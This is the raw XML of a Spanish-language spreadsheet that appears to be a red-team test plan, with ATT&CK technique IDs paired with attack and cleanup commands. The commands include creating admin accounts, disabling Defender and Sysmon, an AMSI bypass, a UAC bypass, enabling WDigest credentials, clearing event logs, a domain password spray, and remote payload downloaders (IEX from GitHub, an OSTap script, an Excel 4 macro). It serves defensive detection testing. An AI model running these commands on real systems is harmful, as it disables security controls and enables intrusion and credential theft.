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os\Proyectos\GestiónVuln\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{14CCE53A-321C-40D7-A3CB-823F81816759}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="-110" yWindow="-110" windowWidth="19420" windowHeight="10420" activeTab="3" xr2:uid="{6E5E7D19-67B6-4414-87C0-AC42840B36A4}"/>
  </bookViews>
  <sheets>
    <sheet name="Pruebas" sheetId="1" r:id="rId1"/>
    <sheet name="Otras pruebas" sheetId="2" r:id="rId2"/>
    <sheet name="Cumplimiento" sheetId="3" r:id="rId3"/>
    <sheet name="Graf_P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12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16" i="1" s="1"/>
  <c r="M41" i="1"/>
  <c r="M42" i="1"/>
  <c r="M43" i="1"/>
  <c r="M44" i="1"/>
  <c r="M45" i="1"/>
  <c r="M46" i="1"/>
  <c r="M47" i="1"/>
  <c r="M48" i="1"/>
  <c r="M119" i="1" s="1"/>
  <c r="M49" i="1"/>
  <c r="M120" i="1" s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94" i="1" s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90" i="1"/>
  <c r="M91" i="1"/>
  <c r="M92" i="1"/>
  <c r="M93" i="1"/>
  <c r="M104" i="1"/>
  <c r="M105" i="1"/>
  <c r="M106" i="1"/>
  <c r="M107" i="1"/>
  <c r="M113" i="1" s="1"/>
  <c r="M108" i="1"/>
  <c r="M114" i="1" s="1"/>
  <c r="M109" i="1"/>
  <c r="M110" i="1"/>
  <c r="M111" i="1"/>
  <c r="M115" i="1"/>
  <c r="M121" i="1"/>
  <c r="M123" i="1"/>
  <c r="M124" i="1"/>
  <c r="M125" i="1"/>
  <c r="M126" i="1"/>
  <c r="M127" i="1"/>
  <c r="M128" i="1"/>
  <c r="M12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12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16" i="1" s="1"/>
  <c r="L41" i="1"/>
  <c r="L42" i="1"/>
  <c r="L43" i="1"/>
  <c r="L44" i="1"/>
  <c r="L45" i="1"/>
  <c r="L46" i="1"/>
  <c r="L47" i="1"/>
  <c r="L48" i="1"/>
  <c r="L119" i="1" s="1"/>
  <c r="L49" i="1"/>
  <c r="L120" i="1" s="1"/>
  <c r="L51" i="1"/>
  <c r="L52" i="1"/>
  <c r="L53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94" i="1" s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90" i="1"/>
  <c r="L91" i="1"/>
  <c r="L92" i="1"/>
  <c r="L93" i="1"/>
  <c r="L104" i="1"/>
  <c r="L105" i="1"/>
  <c r="L106" i="1"/>
  <c r="L107" i="1"/>
  <c r="L113" i="1" s="1"/>
  <c r="L108" i="1"/>
  <c r="L114" i="1" s="1"/>
  <c r="L109" i="1"/>
  <c r="L110" i="1"/>
  <c r="L111" i="1"/>
  <c r="L115" i="1"/>
  <c r="L121" i="1"/>
  <c r="L123" i="1"/>
  <c r="L124" i="1"/>
  <c r="L125" i="1"/>
  <c r="L126" i="1"/>
  <c r="L127" i="1"/>
  <c r="L128" i="1"/>
  <c r="L12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12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16" i="1" s="1"/>
  <c r="J41" i="1"/>
  <c r="J42" i="1"/>
  <c r="J43" i="1"/>
  <c r="J44" i="1"/>
  <c r="J45" i="1"/>
  <c r="J46" i="1"/>
  <c r="J47" i="1"/>
  <c r="J48" i="1"/>
  <c r="J119" i="1" s="1"/>
  <c r="J49" i="1"/>
  <c r="J120" i="1" s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94" i="1" s="1"/>
  <c r="J70" i="1"/>
  <c r="J71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90" i="1"/>
  <c r="J91" i="1"/>
  <c r="J92" i="1"/>
  <c r="J93" i="1"/>
  <c r="J104" i="1"/>
  <c r="J105" i="1"/>
  <c r="J106" i="1"/>
  <c r="J107" i="1"/>
  <c r="J113" i="1" s="1"/>
  <c r="J108" i="1"/>
  <c r="J114" i="1" s="1"/>
  <c r="J109" i="1"/>
  <c r="J110" i="1"/>
  <c r="J111" i="1"/>
  <c r="J115" i="1"/>
  <c r="J121" i="1"/>
  <c r="J123" i="1"/>
  <c r="J124" i="1"/>
  <c r="J125" i="1"/>
  <c r="J126" i="1"/>
  <c r="J127" i="1"/>
  <c r="J128" i="1"/>
  <c r="J129" i="1"/>
  <c r="J2" i="1"/>
  <c r="V2" i="4" l="1"/>
  <c r="U2" i="4"/>
  <c r="T2" i="4"/>
  <c r="M122" i="1"/>
  <c r="L122" i="1"/>
  <c r="J122" i="1"/>
  <c r="M118" i="1"/>
  <c r="L118" i="1"/>
  <c r="J118" i="1"/>
  <c r="M117" i="1"/>
  <c r="L117" i="1"/>
  <c r="J117" i="1"/>
  <c r="P21" i="4"/>
  <c r="O21" i="4"/>
  <c r="N21" i="4"/>
  <c r="P2" i="4"/>
  <c r="O2" i="4"/>
  <c r="N2" i="4"/>
  <c r="M103" i="1"/>
  <c r="J103" i="1"/>
  <c r="L103" i="1"/>
  <c r="M101" i="1"/>
  <c r="M102" i="1"/>
  <c r="L102" i="1"/>
  <c r="L100" i="1"/>
  <c r="L101" i="1"/>
  <c r="J102" i="1"/>
  <c r="J101" i="1"/>
  <c r="M100" i="1"/>
  <c r="J100" i="1"/>
  <c r="M99" i="1"/>
  <c r="M98" i="1"/>
  <c r="L99" i="1"/>
  <c r="J99" i="1"/>
  <c r="L98" i="1"/>
  <c r="J98" i="1"/>
  <c r="M97" i="1"/>
  <c r="M96" i="1"/>
  <c r="J97" i="1"/>
  <c r="L97" i="1"/>
  <c r="L96" i="1"/>
  <c r="J96" i="1"/>
  <c r="M95" i="1"/>
  <c r="L95" i="1"/>
  <c r="J95" i="1"/>
  <c r="M89" i="1"/>
  <c r="L89" i="1"/>
  <c r="J89" i="1"/>
  <c r="M88" i="1"/>
  <c r="J88" i="1"/>
  <c r="L88" i="1"/>
  <c r="M72" i="1"/>
  <c r="D40" i="4" s="1"/>
  <c r="L72" i="1"/>
  <c r="C40" i="4" s="1"/>
  <c r="J72" i="1"/>
  <c r="B40" i="4" s="1"/>
  <c r="L50" i="1"/>
  <c r="J50" i="1"/>
  <c r="L54" i="1"/>
  <c r="M50" i="1"/>
  <c r="M54" i="1"/>
  <c r="J54" i="1"/>
  <c r="C2" i="4"/>
  <c r="D2" i="4"/>
  <c r="B2" i="4"/>
  <c r="O40" i="4" l="1"/>
  <c r="P40" i="4"/>
  <c r="N40" i="4"/>
  <c r="I40" i="4"/>
  <c r="J40" i="4"/>
  <c r="H40" i="4"/>
  <c r="J21" i="4"/>
  <c r="I21" i="4"/>
  <c r="H21" i="4"/>
  <c r="J2" i="4"/>
  <c r="I2" i="4"/>
  <c r="H2" i="4"/>
  <c r="B21" i="4"/>
  <c r="D21" i="4"/>
  <c r="C21" i="4"/>
</calcChain>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="750" uniqueCount="404">
  <si>
    <t>Capitulo</t>
  </si>
  <si>
    <t>ID TTP</t>
  </si>
  <si>
    <t>Prueba</t>
  </si>
  <si>
    <t>Entorno</t>
  </si>
  <si>
    <t>Prueba 1</t>
  </si>
  <si>
    <t>T1136.001</t>
  </si>
  <si>
    <t>cmd</t>
  </si>
  <si>
    <t>net user /del "UserTest" &gt;nul 2&gt;&amp;1</t>
  </si>
  <si>
    <t>Limpieza</t>
  </si>
  <si>
    <t>psh</t>
  </si>
  <si>
    <t>New-LocalUser -Name "UserTest" -NoPassword</t>
  </si>
  <si>
    <t>Remove-LocalUser -Name "UserTest" -ErrorAction Ignore</t>
  </si>
  <si>
    <t>net user /add "UserTest" "UserPassword1!"
net localgroup administrators  "UserTest" /add</t>
  </si>
  <si>
    <t>Comentarios</t>
  </si>
  <si>
    <t>Resultado</t>
  </si>
  <si>
    <t>Esta prueba evaluar la creación y
 aparte la asignación a administradores</t>
  </si>
  <si>
    <t>T1136.002</t>
  </si>
  <si>
    <t>net user "UserTest" "UserPassword1!" /add /domain
net group "Domain Admins" "UserTest" /add /domain</t>
  </si>
  <si>
    <t>net user "UserTest" &gt;nul 2&gt;&amp;1 /del /domain</t>
  </si>
  <si>
    <t>$SamAccountName = 'UserTest'
$AccountPassword = ConvertTo-SecureString '#{password}' -AsPlainText -Force
Add-Type -AssemblyName System.DirectoryServices.AccountManagement
$Context = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList ([System.DirectoryServices.AccountManagement.ContextType]::Domain)
$User = New-Object -TypeName System.DirectoryServices.AccountManagement.UserPrincipal -ArgumentList ($Context)
$User.SamAccountName = $SamAccountName
$TempCred = New-Object System.Management.Automation.PSCredential('a', $AccountPassword)
$User.SetPassword($TempCred.GetNetworkCredential().Password)
$User.Enabled = $True
$User.PasswordNotRequired = $False
$User.DisplayName = $SamAccountName
$User.Save()
$User</t>
  </si>
  <si>
    <t>cmd /c "net user UserTest /del &gt;nul 2&gt;&amp;1"</t>
  </si>
  <si>
    <t>T1112</t>
  </si>
  <si>
    <t>reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /t REG_DWORD /v HideFileExt /d 1 /f</t>
  </si>
  <si>
    <t>reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v HideFileExt /f &gt;nul 2&gt;&amp;1</t>
  </si>
  <si>
    <t>reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /t REG_EXPAND_SZ /v SecurityHealth /d calc.exe /f</t>
  </si>
  <si>
    <t>reg delete HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v SecurityHealth /f &gt;nul 2&gt;&amp;1</t>
  </si>
  <si>
    <t>reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f</t>
  </si>
  <si>
    <t>reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f &gt;nul 2&gt;&amp;1</t>
  </si>
  <si>
    <t>T1098</t>
  </si>
  <si>
    <t>Nombre</t>
  </si>
  <si>
    <t>Admin Account Manipulate</t>
  </si>
  <si>
    <t>Elevación</t>
  </si>
  <si>
    <t>si</t>
  </si>
  <si>
    <t>$x = Get-Random -Minimum 2 -Maximum 9999
$y = Get-Random -Minimum 2 -Maximum 9999
$z = Get-Random -Minimum 2 -Maximum 9999
$w = Get-Random -Minimum 2 -Maximum 9999
Write-Host HaHa_$x$y$z
$fmm = Get-LocalGroupMember -Group Administrators |?{ $_.ObjectClass -match "User" -and $_.PrincipalSource -match "Local"} | Select Name
foreach($member in $fmm) {
    if($member -like "*Administrator*") {
        $account = $member.Name -replace ".+\\\","" # strip computername\
        $originalDescription = (Get-LocalUser -Name $account).Description
        Set-LocalUser -Name $account -Description "atr:$account;$originalDescription".Substring(0,48) # Keep original name in description
        Rename-LocalUser -Name $account -NewName "HaHa_$x$y$z" # Required due to length limitation
        Write-Host "Successfully Renamed $account Account on " $Env:COMPUTERNAME
        }
    }</t>
  </si>
  <si>
    <t>$list = Get-LocalUser |?{$_.Description -like "atr:*"}
foreach($u in $list) {
  $u.Description -match "atr:(?&lt;Name&gt;[^;]+);(?&lt;Description&gt;.*)"
  Set-LocalUser -Name $u.Name -Description $Matches.Description
  Rename-LocalUser -Name $u.Name -NewName $Matches.Name
  Write-Host "Successfully Reverted Account $($u.Name) to $($Matches.Name) on " $Env:COMPUTERNAME
}</t>
  </si>
  <si>
    <t xml:space="preserve">LockBit Black - Modify Group policy settings </t>
  </si>
  <si>
    <t>reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTimeDC /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTimeOffsetDC /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTime /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTimeOffset /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v EnableSmartScreen /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v ShellSmartScreenLevel /t REG_SZ /d Block /f</t>
  </si>
  <si>
    <t>reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTimeDC /f &gt;nul 2&gt;&amp;1
reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTimeOffsetDC /f &gt;nul 2&gt;&amp;1
reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTime /f &gt;nul 2&gt;&amp;1
reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTimeOffset /f &gt;nul 2&gt;&amp;1
reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v EnableSmartScreen /f &gt;nul 2&gt;&amp;1
reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v ShellSmartScreenLevel /f &gt;nul 2&gt;&amp;1</t>
  </si>
  <si>
    <t>New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name GroupPolicyRefreshTimeDC -PropertyType DWord -Value 0 -Force
New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name GroupPolicyRefreshTimeOffsetDC -PropertyType DWord -Value 0 -Force
New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name GroupPolicyRefreshTime -PropertyType DWord -Value 0 -Force
New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name GroupPolicyRefreshTimeOffset -PropertyType DWord -Value 0 -Force
New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name EnableSmartScreen -PropertyType DWord -Value 0 -Force
New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name ShellSmartScreenLevel -Force</t>
  </si>
  <si>
    <t>Remove-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name GroupPolicyRefreshTimeDC -Force -ErrorAction Ignore
Remove-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name GroupPolicyRefreshTimeOffsetDC -Force -ErrorAction Ignore 
Remove-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name GroupPolicyRefreshTime -Force -ErrorAction Ignore
Remove-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name GroupPolicyRefreshTimeOffset -Force -ErrorAction Ignore
Remove-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name EnableSmartScreen -Force -ErrorAction Ignore
Remove-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name ShellSmartScreenLevel -Force -ErrorAction Ignore</t>
  </si>
  <si>
    <t>T1489</t>
  </si>
  <si>
    <t>Stop service using Service Controller</t>
  </si>
  <si>
    <t>sc.exe stop spooler</t>
  </si>
  <si>
    <t>sc.exe start spooler &gt;nul 2&gt;&amp;1</t>
  </si>
  <si>
    <t>Validar que exista el servicio</t>
  </si>
  <si>
    <t>Stop service using net.exe</t>
  </si>
  <si>
    <t>net.exe stop spooler</t>
  </si>
  <si>
    <t>net.exe start spooler &gt;nul 2&gt;&amp;1</t>
  </si>
  <si>
    <t>Stop service by killing process</t>
  </si>
  <si>
    <t>?</t>
  </si>
  <si>
    <t>taskkill.exe /f /im spoolsv.exe</t>
  </si>
  <si>
    <t>NA</t>
  </si>
  <si>
    <t>Revisar ya que el proceso muere</t>
  </si>
  <si>
    <t>T1484.001</t>
  </si>
  <si>
    <t>T1055</t>
  </si>
  <si>
    <t>T1072</t>
  </si>
  <si>
    <t>T1222.001</t>
  </si>
  <si>
    <t>Take ownership using takeown utility</t>
  </si>
  <si>
    <t xml:space="preserve">? </t>
  </si>
  <si>
    <t>mkdir %temp%\T1222.001_takeown_folder
echo T1222.001_takeown1 &gt;&gt; %temp%\T1222.001_takeown_folder\T1222.001_takeown1.txt
echo T1222.001_takeown2 &gt;&gt; %temp%\T1222.001_takeown_folder\T1222.001_takeown2.txt
takeown.exe /f %temp%\T1222.001_takeown_folder /r</t>
  </si>
  <si>
    <t>attrib - hide file</t>
  </si>
  <si>
    <t>mkdir %temp%\T1222.001_attrib_2
echo T1222.001_attrib1 &gt;&gt; %temp%\T1222.001_attrib_2\T1222.001_attrib1.txt
echo T1222.001_attrib2 &gt;&gt; %temp%\T1222.001_attrib_2\T1222.001_attrib2.txt
attrib.exe +h %temp%\T1222.001_attrib_2\T1222.001_attrib1.txt
attrib.exe +h %temp%\T1222.001_attrib_2\T1222.001_attrib2.txt</t>
  </si>
  <si>
    <t>attrib.exe -h %temp%\T1222.001_attrib_2\T1222.001_attrib1.txt
attrib.exe -h %temp%\T1222.001_attrib_2\T1222.001_attrib2.txt
del %temp%\T1222.001_attrib_2\T1222.001_attrib*.txt
rmdir %temp%\T1222.001_attrib_2</t>
  </si>
  <si>
    <t>Grant Full Access to folder for Everyone</t>
  </si>
  <si>
    <t>icacls C:\Users\Public\* /save %temp%\T1222.001-folder-perms-backup.txt /t /q &gt;nul 2&gt;&amp;1
icacls "C:\Users\Public\*" /grant Everyone:F /T /C /Q</t>
  </si>
  <si>
    <t>icacls 'C:\Users\Public\*' /restore #{file_path} /q &gt;nul 2&gt;&amp;1</t>
  </si>
  <si>
    <t>Solo ejecutar en ambientes de prueba</t>
  </si>
  <si>
    <t>T1562.001</t>
  </si>
  <si>
    <t>Uninstall Sysmon</t>
  </si>
  <si>
    <t>sysmon -u</t>
  </si>
  <si>
    <t>sysmon -i -accepteula &gt;nul 2&gt;&amp;1
$parentpath = Split-Path "PathToAtomicsFolder\T1562.001\bin\sysmon.exe"; $zippath = "$parentpath\Sysmon.zip"
New-Item -ItemType Directory $parentpath -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "$zippath"
Expand-Archive $zippath $parentpath -Force; Remove-Item $zippath
if(-not ($Env:Path).contains($parentpath)){$Env:Path += ";$parentpath"}</t>
  </si>
  <si>
    <t>AMSI Bypass - AMSI InitFailed</t>
  </si>
  <si>
    <t>[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)</t>
  </si>
  <si>
    <t>[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$false)</t>
  </si>
  <si>
    <t>Remove AMSI Provider Reg Key</t>
  </si>
  <si>
    <t>Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse</t>
  </si>
  <si>
    <t>New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}" -ErrorAction Ignore | Out-Null</t>
  </si>
  <si>
    <t>Validar ID de carpeta</t>
  </si>
  <si>
    <t>Disable Arbitrary Security Windows Service</t>
  </si>
  <si>
    <t>net.exe stop McAfeeDLPAgentService
sc.exe config McAfeeDLPAgentService start= disabled</t>
  </si>
  <si>
    <t>sc.exe config McAfeeDLPAgentService start= auto &gt;nul 2&gt;&amp;1
net.exe start McAfeeDLPAgentService &gt;nul 2&gt;&amp;1</t>
  </si>
  <si>
    <t>Validar servicio de seguridad a detener</t>
  </si>
  <si>
    <t>Tamper with Windows Defender ATP PowerShell</t>
  </si>
  <si>
    <t>Set-MpPreference -DisableRealtimeMonitoring 1
Set-MpPreference -DisableBehaviorMonitoring 1
Set-MpPreference -DisableScriptScanning 1
Set-MpPreference -DisableBlockAtFirstSeen 1</t>
  </si>
  <si>
    <t>Set-MpPreference -DisableRealtimeMonitoring 0
Set-MpPreference -DisableBehaviorMonitoring 0
Set-MpPreference -DisableScriptScanning 0
Set-MpPreference -DisableBlockAtFirstSeen 0</t>
  </si>
  <si>
    <t>Tamper with Windows Defender Command Prompt</t>
  </si>
  <si>
    <t>sc stop WinDefend
sc config WinDefend start=disabled
sc query WinDefend</t>
  </si>
  <si>
    <t>sc start WinDefend &gt;nul 2&gt;&amp;1
sc config WinDefend start=enabled &gt;nul 2&gt;&amp;1</t>
  </si>
  <si>
    <t>Tamper with Windows Defender Registry</t>
  </si>
  <si>
    <t>Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1</t>
  </si>
  <si>
    <t>Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 0</t>
  </si>
  <si>
    <t>Prevent Powershell History Logging</t>
  </si>
  <si>
    <t>Set-PSReadlineOption –HistorySaveStyle SaveNothing</t>
  </si>
  <si>
    <t>Set-PSReadLineOption -HistorySaveStyle SaveIncrementally</t>
  </si>
  <si>
    <t>Clear Powershell History by Deleting History File</t>
  </si>
  <si>
    <t>Remove-Item (Get-PSReadlineOption).HistorySavePath</t>
  </si>
  <si>
    <t>Validar ya que borra el archivo</t>
  </si>
  <si>
    <t>T1070.003</t>
  </si>
  <si>
    <t>T1021.001</t>
  </si>
  <si>
    <t>$Server=$ENV:logonserver.TrimStart("\")
$User = Join-Path $Env:USERDOMAIN $ENV:USERNAME
$Password="1password2!"
cmdkey /generic:TERMSRV/$Server /user:$User /pass:$Password
mstsc /v:$Server
echo "RDP connection established"</t>
  </si>
  <si>
    <t>RDP to DomainController</t>
  </si>
  <si>
    <t>$p=Tasklist /svc /fi "IMAGENAME eq mstsc.exe" /fo csv | convertfrom-csv
if(-not ([string]::IsNullOrEmpty($p.PID))) { Stop-Process -Id $p.PID }</t>
  </si>
  <si>
    <t>RDP to Server</t>
  </si>
  <si>
    <t>$Server="WIN-DC"
$User="Administrator"
$Password="1password2!"
cmdkey /generic:TERMSRV/$Server /user:$User /pass:$Password
mstsc /v:$Server
echo "RDP connection established"</t>
  </si>
  <si>
    <t>Map admin share</t>
  </si>
  <si>
    <t>T1021.002</t>
  </si>
  <si>
    <t>cmd.exe /c "net use \\OBJETIVO\C$ CONTRASEÑA /u:DOMAIN\Administrator"</t>
  </si>
  <si>
    <t>Copy and Execute File with PsExec</t>
  </si>
  <si>
    <t>C:\PSTools\PsExec.exe \\localhost -accepteula -c C:\Windows\System32\cmd.exe</t>
  </si>
  <si>
    <t>if (Test-Path "C:\PSTools\PsExec.exe") { exit 0} else { exit 1}</t>
  </si>
  <si>
    <t>Requisitos desde psh
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
New-Item -ItemType Directory (Split-Path "C:\PSTools\PsExec.exe") -Force | Out-Null
Copy-Item $env:TEMP\PsTools\PsExec.exe "C:\PSTools\PsExec.exe" -Force</t>
  </si>
  <si>
    <t>Execute command writing output to local Admin Share</t>
  </si>
  <si>
    <t>cmd.exe /Q /c hostname 1&gt; \\127.0.0.1\ADMIN$\output.txt 2&gt;&amp;1</t>
  </si>
  <si>
    <t>T1059.001</t>
  </si>
  <si>
    <t>T1046</t>
  </si>
  <si>
    <t>Port Scan NMap for Windows</t>
  </si>
  <si>
    <t>Invoke-WebRequest -OutFile $env:temp\nmap-7.80-setup.exe https://nmap.org/dist/nmap-7.80-setup.exe
Start-Process $env:temp\nmap-7.80-setup.exe /S
nmap 127.0.0.1</t>
  </si>
  <si>
    <t>Nmap debe ser instalado</t>
  </si>
  <si>
    <t>T1049</t>
  </si>
  <si>
    <t>System Network Connections Discovery</t>
  </si>
  <si>
    <t>netstat
net use
net sessions</t>
  </si>
  <si>
    <t>Get-NetTCPConnection</t>
  </si>
  <si>
    <t>T1110.001</t>
  </si>
  <si>
    <t>T1110.003</t>
  </si>
  <si>
    <t>psh/cmd</t>
  </si>
  <si>
    <t>Invoke-WebRequest -URI https://raw.githubusercontent.com/redcanaryco/atomic-red-team/36d49de4c8b00bf36054294b4a1fcbab3917d7c5/atomics/T1110.003/src/parse_net_users.bat -OutFile $env:temp\parse_net_user.bat
@FOR /F %n in (%temp%\users.txt) do @echo | set/p=. &amp; @net use %logonserver%\IPC$ /user:"%userdomain%\%n" "Spring2020" 1&gt;NUL 2&gt;&amp;1 &amp;&amp; @echo [*] %n:Spring2020 &amp;&amp; @net use /delete %logonserver%\IPC$ &gt; NUL</t>
  </si>
  <si>
    <t>Password Spray all Domain Users</t>
  </si>
  <si>
    <t>Debe existir una lista de usuarios y contraseñas</t>
  </si>
  <si>
    <t>T1039</t>
  </si>
  <si>
    <t>T1041</t>
  </si>
  <si>
    <t>T1567</t>
  </si>
  <si>
    <t>T1070.001</t>
  </si>
  <si>
    <t>Clear Logs</t>
  </si>
  <si>
    <t>wevtutil cl System</t>
  </si>
  <si>
    <t>Delete System Logs Using Clear-EventLog</t>
  </si>
  <si>
    <t>$logs = Get-EventLog -List | ForEach-Object {$_.Log}
$logs | ForEach-Object {Clear-EventLog -LogName $_ }
Get-EventLog -list</t>
  </si>
  <si>
    <t>Clear Event Logs via VBA</t>
  </si>
  <si>
    <t>[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1070.001\src\T1070.001-macrocode.txt" -officeProduct "Word" -sub "ClearLogs"</t>
  </si>
  <si>
    <t>T1548.002</t>
  </si>
  <si>
    <t>Bypass UAC using Event Viewer</t>
  </si>
  <si>
    <t>reg.exe delete hkcu\software\classes\mscfile /f &gt;nul 2&gt;&amp;1</t>
  </si>
  <si>
    <t>reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d C:\Windows\System32\cmd.exe /f
cmd.exe /c eventvwr.msc</t>
  </si>
  <si>
    <t>New-Item "HKCU:\software\classes\mscfile\shell\open\command" -Force
Set-ItemProperty "HKCU:\software\classes\mscfile\shell\open\command" -Name "(default)" -Value "C:\Windows\System32\cmd.exe" -Force
Start-Process "C:\Windows\System32\eventvwr.msc"</t>
  </si>
  <si>
    <t>Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse -ErrorAction Ignore</t>
  </si>
  <si>
    <t>Disable UAC using reg.exe</t>
  </si>
  <si>
    <t>reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f</t>
  </si>
  <si>
    <t>reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f</t>
  </si>
  <si>
    <t>T1204.002</t>
  </si>
  <si>
    <t>OSTap Payload Download</t>
  </si>
  <si>
    <t>echo var url = "https://128.30.52.100/TR/PNG/iso_8859-1.txt", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile(filename, 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); &gt; %TEMP%\OSTapGet.js
cscript //E:Jscript %TEMP%\OSTapGet.js</t>
  </si>
  <si>
    <t>del %TEMP%\OSTapGet.js /F /Q &gt;nul 2&gt;&amp;1</t>
  </si>
  <si>
    <t>Excel 4 Macro</t>
  </si>
  <si>
    <t>$fname = "$env:TEMP\atomic_redteam_x4m_exec.vbs"
$fname1 = "$env:TEMP\procexp.exe"
if (Test-Path $fname) {
  Remove-Item $fname
  Remove-Item $fname1
}
$xlApp = New-Object -COMObject "Excel.Application"
$xlApp.Visible = $True
$xlApp.DisplayAlerts = $False
$xlBook = $xlApp.Workbooks.Add()
$sheet = $xlBook.Excel4MacroSheets.Add()
if ("$env:Username" -ne "") {
  $sheet.Cells.Item(1,1) = "$env:Username"
} else {
  $sheet.Cells.Item(1,1) = "=GET.WORKSPACE(26)"
}
$sheet.Cells.Item(2,1) = "procexp.exe"
$sheet.Cells.Item(3,1) = "atomic_redteam_x4m_exec.vbs"
$sheet.Cells.Item(4,1) = "=IF(ISNUMBER(SEARCH(`"64`",GET.WORKSPACE(1))), GOTO(A5),)"
$sheet.Cells.Item(5,1) = "=FOPEN(`"C:\Users\`"&amp;A1&amp;`"\AppData\Local\Temp\`"&amp;A3&amp;`"`", 3)"
$sheet.Cells.Item(6,1) = "=FWRITELN(A5, `"url = `"`"https://live.sysinternals.com/procexp.exe`"`"`")"
$sheet.Cells.Item(7,1) = "=FWRITELN(A5, `"`")"
$sheet.Cells.Item(8,1) = "=FWRITELN(A5, `"Set winHttp = CreateObject(`"`"WinHTTP.WinHTTPrequest.5.1`"`")`")"
$sheet.Cells.Item(9,1) = "=FWRITELN(A5, `"winHttp.Open `"`"GET`"`", url, False`")"
$sheet.Cells.Item(10,1) = "=FWRITELN(A5, `"winHttp.Send`")"
$sheet.Cells.Item(11,1) = "=FWRITELN(A5, `"If winHttp.Status = 200 Then`")"
$sheet.Cells.Item(12,1) = "=FWRITELN(A5, `"Set oStream = CreateObject(`"`"ADODB.Stream`"`")`")"
$sheet.Cells.Item(13,1) = "=FWRITELN(A5, `"oStream.Open`")"
$sheet.Cells.Item(14,1) = "=FWRITELN(A5, `"oStream.Type = 1`")"
$sheet.Cells.Item(15,1) = "=FWRITELN(A5, `"oStream.Write winHttp.responseBody`")"
